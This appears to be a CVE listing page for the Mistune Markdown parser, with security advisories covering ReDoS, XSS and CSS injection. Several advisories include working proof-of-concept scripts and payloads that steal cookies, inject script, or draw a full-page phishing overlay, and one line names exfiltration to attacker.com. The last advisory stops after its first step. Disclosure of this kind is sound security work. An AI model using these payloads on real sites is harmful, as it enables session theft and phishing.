Mistune
by Authlib
CVEs (7)
| CVE | Sev | Risk | CVSS | EPSS | KEV | Published | Description |
|---|---|---|---|---|---|---|---|
| CVE-2026-33079 | Hig | 0.57 | — | 0.00 | May 6, 2026 | In versions 3.0.0a1 through 3.2.0 of Mistune, there is a ReDoS (Regular Expression Denial of Service) vulnerability in `LINK_TITLE_RE` that allows an attacker who can supply Markdown for parsing to cause denial of service. The regular expression used for parsing link titles contains overlapping alternatives that can trigger catastrophic backtracking. In both the double-quoted and single-quoted branches, a backslash followed by punctuation can be matched either as an escaped punctuation sequence or as two ordinary characters, creating an ambiguous pattern inside a repeated group. If an attacker supplies Markdown containing repeated `\!` sequences with no closing quote, the regex engine explores an exponential number of backtracking paths. This is reachable through normal Markdown parsing of inline links and block link reference definitions. A small crafted input can therefore cause significant CPU consumption and make applications using Mistune unresponsive. | |
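The ambiguity described for CVE-2026-33079 can be illustrated with a simplified stand-in pattern. The sketch below does not reproduce Mistune's actual `LINK_TITLE_RE`; `AMBIGUOUS_TITLE`, `LINEAR_TITLE`, and `crafted_title` are hypothetical names, and the rewrite shown is one common way to make the alternatives disjoint, not necessarily the upstream fix.

```python
import re

# Hypothetical, simplified stand-in for a double-quoted link title pattern.
# Ambiguous: "\!" matches either as one escaped-punctuation unit or as two
# ordinary characters, because [^"] also accepts the backslash.
AMBIGUOUS_TITLE = re.compile(r'"(?:\\[!-/:-@\[-`{-~]|[^"])*"')

# Disjoint alternatives: a backslash is only ever consumed together with the
# character after it, so each input position has exactly one way to match.
LINEAR_TITLE = re.compile(r'"(?:\\.|[^"\\])*"')


def crafted_title(repeats: int) -> str:
    """Opening quote, repeated backslash-bang pairs, and no closing quote."""
    return '"' + "\\!" * repeats


# Both patterns accept a well-formed title containing an escaped quote.
well_formed = '"a \\" b"'
assert AMBIGUOUS_TITLE.match(well_formed).group(0) == well_formed
assert LINEAR_TITLE.match(well_formed).group(0) == well_formed

# The linear pattern rejects a long crafted input without exploring
# alternative parses. Keep `repeats` small (around 20 or less) when trying
# the ambiguous pattern on the same input; its work roughly doubles per pair.
assert LINEAR_TITLE.match(crafted_title(2000)) is None
```

The design choice is that the second alternative excludes the backslash, so the engine has nothing to retry when the closing quote is missing.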
| CVE-2026-44897 | med | 0.26 | — | — | May 9, 2026 | ## Summary `HTMLRenderer.heading()` builds the opening `<hN>` tag by string-concatenating the `id` attribute value directly into the HTML — with no call to `escape()`, `safe_entity()`, or any other sanitisation function. A double-quote character `"` in the `id` value terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers, `src=`, `href=`, etc.) into the heading element. The default TOC hook assigns safe auto-incremented IDs (`toc_1`, `toc_2`, …) that never contain user text. However, the `add_toc_hook()` API accepts a caller-supplied `heading_id` callback. Deriving heading IDs from the heading text itself — to produce human-readable slug anchors like `#installation` or `#getting-started` — is by far the most common real-world usage of this callback (every major documentation generator does this). When the callback returns raw heading text, an attacker who controls heading content can break out of the `id=` attribute. ## Details **File:** `src/mistune/renderers/html.py` ```python def heading(self, text: str, level: int, **attrs: Any) -> str: tag = "h" + str(level) html = "<" + tag _id = attrs.get("id") if _id: html += ' id="' + _id + '"' # ← _id is never escaped return html + ">" + text + "</" + tag + ">\n" ``` The `text` body (line content) *is* escaped upstream by the inline token renderer, which is why a double quote in `text` arrives as `&quot;` etc. But `_id` arrives as a raw string directly from whatever the `heading_id` callback returned — no escaping occurs at any point in the pipeline. ## PoC **Step 1 — Establish the baseline (safe default IDs)** The script creates a parser with `escape=True` and the default `add_toc_hook()` (no custom `heading_id` callback). 
The default hook generates sequential numeric IDs: ```python md_safe = create_markdown(escape=True) add_toc_hook(md_safe) # default: heading_id produces toc_1, toc_2, … bl_src = "## Introduction\n" bl_out, _ = md_safe.parse(bl_src) ``` Output — ID is auto-generated, no user text appears in it: ```html <h2 id="toc_1">Introduction</h2> ``` **Step 2 — Add the realistic trigger: a text-based `heading_id` callback** Deriving an anchor ID from the heading text is the standard real-world pattern (slugifiers, `mkdocs`, `sphinx`, `jekyll` all do this). The PoC uses the simplest possible version — return the raw heading text unchanged — to show the vulnerability without any extra transformation: ```python def raw_id(token, index): return token.get("text", "") # returns raw heading text as the ID md_vuln = create_markdown(escape=True) add_toc_hook(md_vuln, heading_id=raw_id) ``` **Step 3 — Craft the exploit payload** Construct a heading whose text contains a double-quote followed by an injected attribute: ``` ## foo" onmouseover="alert(document.cookie)" x=" ``` When `raw_id` is called, `token["text"]` is `foo" onmouseover="alert(document.cookie)" x="`. This is passed verbatim to `heading()` as the `id` attribute value. **Step 4 — Observe attribute breakout in the output** ```python ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n' ex_out, _ = md_vuln.parse(ex_src) ``` Actual output: ```html <h2 id="foo" onmouseover="alert(document.cookie)" x="">foo&quot; onmouseover=&quot;alert(document.cookie)&quot; x=&quot;</h2> ``` Note: the heading **body text** is correctly escaped (`&quot;`), but the **`id=` attribute** is not. A user who moves their mouse over the heading triggers `alert(document.cookie)`. Any JavaScript payload can be substituted. ### Script A script was written to verify this issue. It creates an HTML page showing the bypass rendering in the browser. 
```python #!/usr/bin/env python3 """H2: HTMLRenderer.heading() inserts the id= value verbatim — no escaping.""" import os, html as h from mistune import create_markdown from mistune.toc import add_toc_hook def raw_id(token, index): return token.get("text", "") # --- baseline --- md_safe = create_markdown(escape=True) add_toc_hook(md_safe) bl_file = "baseline_h2.md" bl_src = "## Introduction\n" with open(os.path.join(os.getcwd(), bl_file), "w") as f: f.write(bl_src) bl_out, _ = md_safe.parse(bl_src) print(f"[{bl_file}]\n{bl_src}") print("[output — id=toc_1, no user content, safe]") print(bl_out) # --- exploit --- md_vuln = create_markdown(escape=True) add_toc_hook(md_vuln, heading_id=raw_id) ex_file = "exploit_h2.md" ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n' with open(os.path.join(os.getcwd(), ex_file), "w") as f: f.write(ex_src) ex_out, _ = md_vuln.parse(ex_src) print(f"[{ex_file}]\n{ex_src}") print("[output — heading_id returns raw text, id= not escaped]") print(ex_out) # --- HTML report --- CSS = """ body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px} h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px} p.desc{color:#555;font-size:.9em;margin-top:6px} .case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)} .case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em} .baseline .case-header{background:#d1fae5;color:#065f46} .exploit .case-header{background:#fee2e2;color:#7f1d1d} .panels{display:grid;grid-template-columns:1fr 1fr;background:#fff} .panel{padding:16px} .panel+.panel{border-left:1px solid #eee} .panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em} pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all} 
.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace} .rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em} """ def case(kind, label, filename, src, out): return f""" <div class="case {kind}"> <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div> <div class="panels"> <div class="panel"> <h3>Input — {h.escape(filename)}</h3> <pre>{h.escape(src)}</pre> </div> <div class="panel"> <h3>Output — HTML source</h3> <pre>{h.escape(out)}</pre> <div class="rlabel">↓ rendered in browser (hover the heading to trigger onmouseover)</div> <div class="rendered">{out}</div> </div> </div> </div>""" page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"> <title>H2 — Heading ID XSS</title><style>{CSS}</style></head><body> <h1>H2 — Heading ID XSS (unescaped id= attribute)</h1> <p class="desc">HTMLRenderer.heading() in renderers/html.py does html += ' id="' + _id + '"' with no escaping. Triggered when heading_id callback returns raw heading text — the most common doc-generator pattern.</p> {case("baseline", "Clean heading → sequential id=toc_1, safe", bl_file, bl_src, bl_out)} {case("exploit", "Malicious heading → quotes break out of id=, onmouseover injected", ex_file, ex_src, ex_out)} </body></html>""" out_path = os.path.join(os.getcwd(), "report_h2.html") with open(out_path, "w") as f: f.write(page) print(f"\n[report] {out_path}") ``` Example Usage: ```bash python poc.py ``` Once the script is run, open `report_h2.html` in the browser and observe the behaviour. 
## Impact | Dimension | Assessment | |------------------|-----------| | **Confidentiality** | Session cookie / auth token theft via JavaScript execution triggered on mouse interaction | | **Integrity** | DOM manipulation, phishing content injection, forced navigation | | **Availability** | Page freeze or crash available to attacker | **Risk context:** This vulnerability targets the most common customisation point for heading IDs. Any documentation site, wiki, or blog engine that generates slug-style anchors from heading text is vulnerable if it uses mistune's `heading_id` callback without independently sanitising the returned value. | |
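For CVE-2026-44897, one caller-side mitigation is to have the `heading_id` callback return only characters that are harmless inside an HTML attribute. The following is a minimal sketch, assuming the `(token, index)` callback signature shown in the PoC; `slug_id` and the `section-N` fallback are hypothetical and not part of mistune.

```python
import re


def slug_id(token, index):
    """Return a slug limited to lowercase letters, digits and hyphens.

    Hypothetical replacement for the PoC's `raw_id` callback. Quotes, angle
    brackets and whitespace never survive, so the value cannot terminate
    an id="..." attribute.
    """
    text = token.get("text", "")
    slug = re.sub(r"[^a-z0-9]+", "-", text.lower()).strip("-")
    # Fall back to a positional ID when the heading has no usable characters.
    return slug or "section-{}".format(index)


payload = {"text": 'foo" onmouseover="alert(document.cookie)" x="'}
print(slug_id(payload, 0))  # foo-onmouseover-alert-document-cookie-x
```

It would be registered the same way the PoC registers `raw_id`, that is `add_toc_hook(md, heading_id=slug_id)`. This allowlist drops non-ASCII letters, so a site with non-English headings would likely want a wider character set.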
| CVE-2026-44896 | med | 0.26 | — | — | May 8, 2026 | In `src/mistune/directives/image.py`, the `render_figure()` function concatenates `figclass` and `figwidth` options directly into HTML attributes without escaping (lines 152-168). This allows attribute injection and XSS even when `HTMLRenderer(escape=True)` is used, because these values bypass the inline renderer. Other attributes in the same file (src, alt, style) are properly escaped; figclass/figwidth were missed. | |
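For CVE-2026-44896, the missing step is escaping the two option values before they are concatenated into attributes. The sketch below is not mistune's `render_figure()`; `figure_open_tag` is a hypothetical helper that uses the standard library's `html.escape` to show the idea.

```python
from html import escape


def figure_open_tag(figclass=None, figwidth=None):
    """Build an opening <figure> tag with attribute values escaped.

    Hypothetical helper, not mistune's implementation.
    """
    tag = "<figure"
    if figclass:
        # quote=True also escapes " and ', so the value stays inside the attribute.
        tag += ' class="' + escape(figclass, quote=True) + '"'
    if figwidth:
        tag += ' style="width:' + escape(figwidth, quote=True) + '"'
    return tag + ">"


print(figure_open_tag(figclass='x" onclick="alert(1)'))
# <figure class="x&quot; onclick=&quot;alert(1)">
```

Escaping only prevents attribute breakout. A `figwidth` value placed inside `style=` would still need to be validated as a CSS length to rule out injected CSS properties.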
| CVE-2026-44708 | med | 0.26 | — | — | May 8, 2026 | ## Summary The mistune math plugin renders inline math (`$...$`) and block math (`$$...$$`) by concatenating the raw user-supplied content directly into the HTML output **without any HTML escaping**. This occurs even when the parser is explicitly created with `escape=True`, which is supposed to guarantee that all user-controlled text is sanitised before reaching the DOM. The result is a silent contract violation: a developer who enables `escape=True` reasonably expects complete XSS protection, but the math plugin operates as an independent render path that ignores the renderer's `_escape` flag entirely. ## Details **File:** `src/mistune/plugins/math.py` ```python def render_inline_math(renderer, text): # `text` is raw user input — no escape() call anywhere return r'<span class="math">\(' + text + r"\)</span>" def render_block_math(renderer, text): # same issue for block-level $$...$$ return '<div class="math">$$\n' + text + "\n$$</div>\n" ``` Both functions take `text` directly from the parsed token and concatenate it into the output string. Neither function: - calls `escape(text)` from `mistune.util` - checks `renderer._escape` - calls `safe_entity(text)` or any other sanitisation helper The `escape=True` flag only influences the main `HTMLRenderer` methods (`paragraph`, `heading`, `codespan`, etc.). Plugin render functions registered via `md.renderer.register()` receive the `renderer` instance but have no mechanism that enforces the escape contract - they must opt in manually, and `math.py` does not. 
## PoC **Step 1 — Establish the baseline (escape=True works for plain HTML)** The script creates a markdown parser with `escape=True` and the math plugin enabled, then feeds it a raw `<script>` tag that is *not* inside math delimiters: ```python md = create_markdown(escape=True, plugins=["math"]) bl_src = "<script>alert(document.cookie)</script>\n" bl_out = str(md(bl_src)) ``` Expected and actual output — the script tag is correctly escaped: ```html <p>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</p> ``` This confirms `escape=True` is working for the normal render path. **Step 2 — Craft the exploit payload** Wrap the identical `<script>` payload inside inline math delimiters `$...$`. The content is extracted from the token as `text` and handed to `render_inline_math()`: ```python ex_src = "$<script>alert(document.cookie)</script>$\n" ex_out = str(md(ex_src)) ``` **Step 3 — Observe the bypass** Actual output — the script tag is emitted raw, unescaped: ```html <p><span class="math">\(<script>alert(document.cookie)</script>\)</span></p> ``` The `<script>` block is live inside the `<span class="math">` wrapper. Any browser that renders this HTML will execute `alert(document.cookie)`. **Step 4 — Block math variant (`$$...$$`)** The same bypass applies to block-level math. Payload: ``` $$ <img src=x onerror="alert(document.cookie)"> $$ ``` Output: ```html <div class="math">$$ <img src=x onerror="alert(document.cookie)"> $$</div> ``` The `onerror` handler fires as soon as the browser tries to load the non-existent image `x`. ### Script A verification script was written to test this issue. It creates an HTML page showing the bypass rendering in the browser. 
```python #!/usr/bin/env python3 """H1: Math plugin bypasses escape=True — HTML inside $...$ passes through raw.""" import os, html as h from mistune import create_markdown md = create_markdown(escape=True, plugins=["math"]) # --- baseline --- bl_file = "baseline_h1.md" bl_src = "<script>alert(document.cookie)</script>\n" with open(os.path.join(os.getcwd(), bl_file), "w") as f: f.write(bl_src) bl_out = str(md(bl_src)) print(f"[{bl_file}]\n{bl_src}") print("[output — escape=True works normally here]") print(bl_out) # --- exploit --- ex_file = "exploit_h1.md" ex_src = "$<script>alert(document.cookie)</script>$\n" with open(os.path.join(os.getcwd(), ex_file), "w") as f: f.write(ex_src) ex_out = str(md(ex_src)) print(f"[{ex_file}]\n{ex_src}") print("[output — escape=True bypassed inside math delimiters]") print(ex_out) # --- HTML report --- CSS = """ body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px} h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px} p.desc{color:#555;font-size:.9em;margin-top:6px} .case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)} .case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em} .baseline .case-header{background:#d1fae5;color:#065f46} .exploit .case-header{background:#fee2e2;color:#7f1d1d} .panels{display:grid;grid-template-columns:1fr 1fr;background:#fff} .panel{padding:16px} .panel+.panel{border-left:1px solid #eee} .panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em} pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all} .rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace} .rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em} """ 
def case(kind, label, filename, src, out): return f""" <div class="case {kind}"> <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div> <div class="panels"> <div class="panel"> <h3>Input — {h.escape(filename)}</h3> <pre>{h.escape(src)}</pre> </div> <div class="panel"> <h3>Output — HTML source</h3> <pre>{h.escape(out)}</pre> <div class="rlabel">↓ rendered in browser</div> <div class="rendered">{out}</div> </div> </div> </div>""" page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"> <title>H1 — Math XSS</title><style>{CSS}</style></head><body> <h1>H1 — Math Plugin XSS (escape=True bypass)</h1> <p class="desc">render_inline_math() in plugins/math.py concatenates user content without escape(). The escape=True renderer flag is completely ignored inside $...$ delimiters.</p> {case("baseline", "Same HTML outside $...$ — escape=True works", bl_file, bl_src, bl_out)} {case("exploit", "Same HTML inside $...$ — escape=True bypassed", ex_file, ex_src, ex_out)} </body></html>""" out_path = os.path.join(os.getcwd(), "report_h1.html") with open(out_path, "w") as f: f.write(page) print(f"\n[report] {out_path}") ``` Example usage: ```bash python poc.py ``` Once the script is run, open `report_h1.html` in the browser and observe the behaviour. ## Impact | Dimension | Assessment | |------------------|-----------| | **Confidentiality** | Attacker can exfiltrate session cookies, auth tokens, and any data visible to the victim's browser session | | **Integrity** | Attacker can mutate page content, inject phishing forms, redirect the user, or perform authenticated actions | | **Availability** | Attacker can crash or freeze the page (denial-of-service to the user) | **Risk amplifier:** This is a *bypass* of an explicit security control. Developers who have audited their application and confirmed `escape=True` is set believe they have XSS protection. 
This vulnerability silently invalidates that assumption for every math-enabled parser instance, making it likely to be missed in code reviews and security audits. | |
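For CVE-2026-44708, the two render functions quoted in the advisory can be made to escape their input before concatenation. This is a sketch under assumptions, not the upstream patch: it uses the standard library's `html.escape` as a stand-in for mistune's own `escape()` helper so that the example is self-contained, and it ignores the `renderer` argument.

```python
from html import escape


def render_inline_math(renderer, text):
    # Escape before concatenation so <, >, & and quotes become entities.
    return r'<span class="math">\(' + escape(text) + r"\)</span>"


def render_block_math(renderer, text):
    # Same treatment for block-level $$...$$ content.
    return '<div class="math">$$\n' + escape(text) + "\n$$</div>\n"


print(render_inline_math(None, "<script>alert(document.cookie)</script>"))
# <span class="math">\(&lt;script&gt;alert(document.cookie)&lt;/script&gt;\)</span>
```

Because browsers decode entities in text nodes, a client-side math renderer that reads the element's text should still see the original characters such as `<` and `&`.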
| CVE-2026-44899 | 0.00 | — | — | May 14, 2026 | ## Summary The Image directive plugin validates the `:width:` and `:height:` options with a regex compiled as `_num_re = re.compile(r"^\d+(?:\.\d*)?")`. This pattern is applied via `re.match()` (which anchors only at the **start** of the string, not the end). Any value that begins with one or more digits passes validation, regardless of what follows. When the validated value is not a plain integer, `render_block_image()` inserts it directly into a `style="width:...;"` or `style="height:...;"` attribute. Because the value was accepted by the prefix-only regex, any CSS after the leading digits reaches the `style=` attribute verbatim and without escaping. An attacker can therefore inject an arbitrary chain of CSS properties — including `position:fixed`, `background-color`, `z-index`, `outline`, and `opacity` — using nothing more than a single `:width:` option in a fenced image directive. The resulting element can visually cover the entire browser viewport, enabling full-page phishing overlays and UI redressing attacks. ## Details **File:** `src/mistune/directives/image.py` ```python _num_re = re.compile(r"^\d+(?:\.\d*)?") # no $ anchor — prefix match only def _parse_attrs(options): height = options.get("height") width = options.get("width") if height and _num_re.match(height): # passes if value STARTS with a digit attrs["height"] = height # full value stored, not just digits if width and _num_re.match(width): # same — prefix-only check attrs["width"] = width ``` And in `render_block_image()`: ```python if width: if width.isdigit(): img += ' width="' + width + '"' # safe: integer → HTML attribute else: style += "width:" + width + ";" # UNSAFE: non-integer → raw style value ``` The `isdigit()` branch correctly uses an HTML attribute for plain integers. The `else` branch assumes that anything that passed `_num_re.match()` is a safe CSS length like `100px` or `50%`. 
However, because the regex is prefix-only, `100vw;height:100vh;position:fixed;...` also passes, and the entire string lands in `style=` unmodified. ## PoC **Step 1 — Establish the baseline (safe plain-integer dimensions)** The script creates a parser with `escape=True`, `FencedDirective`, and the `Image` plugin. A safe image directive is rendered with integer `width` and `height`: ```python md = create_markdown(escape=True, plugins=[FencedDirective([Image()])]) bl_src = ( "```{image} photo.jpg\n" ":width: 400\n" ":height: 300\n" ":alt: safe image\n" "```\n" ) bl_out = str(md(bl_src)) ``` Expected and actual output — clean `width=` and `height=` HTML attributes, no `style=`: ```html <div class="block-image"><img src="photo.jpg" alt="safe image" width="400" height="300" /></div> ``` **Step 2 — Understand why non-integer widths go into `style=`** When `width` is not a plain integer (e.g., `100px`), `width.isdigit()` returns `False`, so the render path falls through to `style += "width:" + width + ";"`. This is the intended mechanism for CSS-unit dimensions. The flaw is that `_num_re.match()` lets far more than CSS units through. 
**Step 3 — Craft the exploit payload** Provide a `:width:` value that begins with a valid number (satisfying `_num_re.match()`) but appends an entire CSS attack chain after it: ``` :width: 100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93 ``` - `100vw` — starts with `1`, passes `_num_re.match()`; also sets the width to full viewport width - `;height:100vh` — overrides height to full viewport height - `;position:fixed` — lifts element out of document flow, fixed to the browser viewport - `;top:0;left:0` — anchors overlay to the top-left corner - `;z-index:9999` — places it above all other page content - `;background-color:#e11d48` — fills the overlay with vivid crimson - `;outline:8px solid #facc15` — adds a bright yellow border - `;color:#fff;opacity:.93` — styles the alt-text label in white with near-full opacity Full exploit markdown: ``` ```{image} x.jpg :width: 100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93 :alt: ⚠ CSS INJECTED — click to dismiss ⚠ ``` ``` **Step 4 — Observe the injected `style=` in the output** ```python ex_src = ( "```{image} x.jpg\n" ":width: 100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;" "background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93\n" ":alt: ⚠ CSS INJECTED — click to dismiss ⚠\n" "```\n" ) ex_out = str(md(ex_src)) ``` Actual output: ```html <div class="block-image"><img src="x.jpg" alt="⚠ CSS INJECTED — click to dismiss ⚠" style="width:100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93;" /></div> ``` Every injected CSS property is present in the `style=` attribute. 
When a browser renders this HTML, the `<img>` element: - expands to fill 100% of the viewport width and height - sits fixed at the top-left corner, scrolling with the viewport - is coloured crimson with a yellow outline - appears above all other page content The result is a complete full-page phishing overlay generated from a single Markdown image directive. ### Script I have built a script that you can use to verify this. It creates a HTML page showing the bypass so that you can see it render in the browser. ```python #!/usr/bin/env python3 """H6: Image directive CSS injection — width/height use prefix-only re.match(). Exploit combines: position:fixed + background-color + outline colour → a full-viewport coloured overlay injected via a single :width: option. """ import os, html as h from mistune import create_markdown from mistune.directives import FencedDirective from mistune.directives.image import Image md = create_markdown(escape=True, plugins=[FencedDirective([Image()])]) # --- baseline --- bl_file = "baseline_h6.md" bl_src = ( "```{image} photo.jpg\n" ":width: 400\n" ":height: 300\n" ":alt: safe image\n" "```\n" ) with open(os.path.join(os.getcwd(), bl_file), "w") as f: f.write(bl_src) bl_out = str(md(bl_src)) print(f"[{bl_file}]\n{bl_src}") print("[output — clean width/height attributes, no style injection]") print(bl_out) # --- exploit --- # _num_re.match() is prefix-only (no $ anchor), so anything after the leading # digits is accepted and written verbatim into style="width:<value>;". 
# This single :width: value smuggles a full CSS attack chain: # position:fixed → overlay sits above the entire page # top/left/width/height → covers 100 % of the viewport # background-color:#e11d48 → vivid crimson fill # outline:8px solid #facc15 → bright yellow border # color:#fff → white alt-text label # z-index:9999 → on top of everything ex_file = "exploit_h6.md" ex_src = ( "```{image} x.jpg\n" ":width: 100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;" "background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93\n" ":alt: ⚠ CSS INJECTED — click to dismiss ⚠\n" "```\n" ) with open(os.path.join(os.getcwd(), ex_file), "w") as f: f.write(ex_src) ex_out = str(md(ex_src)) print(f"[{ex_file}]\n{ex_src}") print("[output — colour + background-colour + fixed overlay injected into style=]") print(ex_out) # --- HTML report --- CSS = """ body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px} h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px} p.desc{color:#555;font-size:.9em;margin-top:6px} .warn{background:#fffbeb;border:1px solid #fbbf24;border-radius:6px;padding:10px 16px; font-size:.85em;color:#92400e;margin:12px 0} .case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc; box-shadow:0 1px 4px rgba(0,0,0,.1)} .case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em} .baseline .case-header{background:#d1fae5;color:#065f46} .exploit .case-header{background:#fee2e2;color:#7f1d1d} .panels{display:grid;grid-template-columns:1fr 1fr;background:#fff} .panel{padding:16px} .panel+.panel{border-left:1px solid #eee} .panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em} pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px; font-size:.78em;white-space:pre-wrap;word-break:break-all} .rlabel{font-size:.68em;color:#aaa;margin:10px 0 
4px;font-family:monospace} .rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px; background:#fff;font-size:.9em;position:relative;overflow:hidden;height:180px} /* scope the live-render sandbox so position:fixed stays inside the box */ .sandbox{position:relative;width:100%;height:100%} .sandbox img{max-width:100%;max-height:100%;object-fit:contain} /* override position:fixed on exploit img to keep it inside the preview box */ .sandbox img[style*="position:fixed"]{position:absolute!important;width:100%!important; height:100%!important;top:0!important;left:0!important} """ def case(kind, label, filename, src, out): header = "BASELINE" if kind == "baseline" else "EXPLOIT" sandbox = f'<div class="sandbox">{out}</div>' return f""" <div class="case {kind}"> <div class="case-header">{header} — {h.escape(label)}</div> <div class="panels"> <div class="panel"> <h3>Input — {h.escape(filename)}</h3> <pre>{h.escape(src)}</pre> </div> <div class="panel"> <h3>Output — HTML source</h3> <pre>{h.escape(out)}</pre> <div class="rlabel">↓ live render (sandboxed to preview box)</div> <div class="rendered">{sandbox}</div> </div> </div> </div>""" page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"> <title>H6 — Image CSS Injection</title><style>{CSS}</style></head><body> <h1>H6 — Image Directive CSS Injection</h1> <p class="desc"> <code>_parse_attrs()</code> in <code>directives/image.py</code> validates <code>:width:</code> / <code>:height:</code> with <code>_num_re.match()</code> (prefix-only — no <code>$</code> anchor). Anything after the leading digits is accepted verbatim and written straight into a <code>style=</code> attribute. A single <code>:width:</code> option is sufficient to smuggle an arbitrary CSS chain: <strong>position:fixed · background-color · outline colour · full-viewport overlay</strong>. </p> <div class="warn"> ⚠ The EXPLOIT preview below is sandboxed inside its box. 
In a real document the crimson overlay would cover the <em>entire browser window</em>. </div> {case("baseline", "Integer dims → clean width/height= attributes, no style=", bl_file, bl_src, bl_out)} {case("exploit", ":width: carries position:fixed + background-color + outline → full-viewport coloured overlay", ex_file, ex_src, ex_out)} </body></html>""" out_path = os.path.join(os.getcwd(), "report_h6.html") with open(out_path, "w") as f: f.write(page) print(f"\n[report] {out_path}") ``` Example usage: ```bash python poc.py ``` Once you run the script, open `report_h6.html` in the browser and observe the behaviour. ## Impact | Dimension | Assessment | |------------------|-----------| | **Confidentiality** | CSS-based data exfiltration via `background-image: url(https://attacker.com/?leak=...)` is possible in some browser/CSP configurations | | **Integrity** | Full-viewport overlay enables complete UI replacement: phishing login forms, fake alerts, click-jacking, brand impersonation | | **Availability** | The overlay obscures all page content from the user until dismissed or navigated away | **Real-world impact scenario:** An attacker posts a Markdown document to a platform (wiki, issue tracker, documentation site) that renders mistune with the Image directive. Any user who views the page sees a full-screen crimson overlay matching the attacker's design, replacing or concealing the legitimate page content. The overlay can contain a convincing login prompt, survey form, or urgent warning designed to capture credentials. | ||
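For CVE-2026-44899, the difference between a prefix match and a whole-string match can be shown with the standard `re` module alone. `PREFIX_NUM` mirrors the `_num_re` pattern quoted in the advisory; `CSS_LENGTH`, its unit allowlist, and `is_safe_dimension` are hypothetical and only sketch one possible stricter check.

```python
import re

# Prefix-only check, as described in the advisory.
PREFIX_NUM = re.compile(r"^\d+(?:\.\d*)?")

# Hypothetical stricter check: a number plus an optional unit from a short
# allowlist, matched against the whole string.
CSS_LENGTH = re.compile(r"\d+(?:\.\d*)?(?:px|em|rem|%|vw|vh)?")


def is_safe_dimension(value):
    """True only when the entire value is a number with an allowed unit."""
    return CSS_LENGTH.fullmatch(value) is not None


payload = "100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999"
print(PREFIX_NUM.match(payload) is not None)  # True: the prefix "100" is enough
print(is_safe_dimension(payload))             # False: trailing CSS is rejected
print(is_safe_dimension("100px"))             # True
```

Using `fullmatch()` rather than adding a `$` anchor avoids the case where `$` also matches just before a trailing newline.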
| CVE-2026-44898 | 0.00 | — | — | May 14, 2026 | ## Summary `render_toc_ul()` builds a `<ul>` table-of-contents tree from a list of `(level, id, text)` tuples. Both the `id` value (used as `href="#<id>"`) and the `text` value (used as the visible link label) are inserted into `<a>` tags via a plain Python format string — with no HTML escaping applied to either value. When heading IDs are derived from user-supplied heading text (the standard use-case for readable slug anchors), an attacker can craft a heading whose text breaks out of the `href="#..."` attribute context, injecting arbitrary HTML tags including `<script>` blocks directly into the rendered TOC. This vulnerability is closely related to H2 (unescaped `id=` in `heading()`): the same `heading_id` callback pattern that triggers H2 also populates the `toc_items` list that `render_toc_ul()` consumes, meaning both vulnerabilities fire simultaneously in a typical documentation setup. ## Details **File:** `src/mistune/toc.py` ```python def render_toc_ul(toc): ... for level, k, text in toc: # k = heading id (used verbatim as href fragment) # text = heading text (used verbatim as link label) item = '<a href="#{}">{}</a>'.format(k, text) # Neither k nor text is passed through escape() at any point ``` The `k` and `text` values come directly from the `toc_items` list accumulated during parsing. If `k` contains `"` or `>`, the `href` attribute is broken. If `text` contains `<`, raw tags are injected as the visible link content. ## PoC **Step 1 — Establish the baseline (safe default IDs)** The script creates a parser with `escape=True` and the default `add_toc_hook()` (no custom callback). 
